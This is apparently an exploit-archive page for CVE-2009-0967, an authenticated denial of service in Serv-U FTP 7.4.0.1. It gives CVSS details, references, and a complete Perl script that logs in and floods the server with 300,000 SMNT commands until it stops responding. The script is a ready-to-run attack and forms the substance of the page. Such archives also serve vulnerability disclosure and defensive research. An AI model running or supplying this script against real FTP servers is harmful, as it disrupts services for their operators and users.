Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Serv-U 7.4.0.1 (SMNT) Denial of Service Exploit (post auth)
2009.03.20
Credit:
Jonathan Salwan
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2009-0967
CWE:
CWE-399
CVSS Base Score:
4/10
Impact Subscore:
2.9/10
Exploitability Subscore:
8/10
Exploit range:
Remote
Attack complexity:
Low
Authentication:
Single time
Confidentiality impact:
None
Integrity impact:
None
Availability impact:
Partial
#!/usr/bin/perl # Soft : FTP Serv-U # Version : v7.4.0.1 # # Denial of Service in Serv-u up to 7.4.0.1 (no crash) # Just the server is saturated, it stops responding. # # Author: Jonathan Salwan # Mail: submit [AT] shell-storm.org # Web: http://www.shell-storm.org use IO::Socket; print "[+] Author : Jonathan Salwan \n"; print "[+] Soft: FTP Serv-U\n"; if (@ARGV < 3) { print "[*] Usage: <serv-u.pl> <host> <port>\n"; print "[*] Exemple: serv-u.pl 127.0.0.1 21 jonathan toto\n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $user = $ARGV[2]; $pass = $ARGV[3]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n"; print "\n[+] Connecting: Ok!\n"; print "[+] Sending request...\n"; $evil = "SMNT\r\n" x 300000; $after = "\x2A\x2A"; print $socket "USER $user\r\n"; print $socket "PASS $pass.$after\r\n"; print $socket "$evil"; sleep(1); close($socket); print "[+]Done! the server is saturated.\n";
References:
http://xforce.iss.net/xforce/xfdb/49260
http://www.securityfocus.com/bid/34127
http://www.milw0rm.com/exploits/8212
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top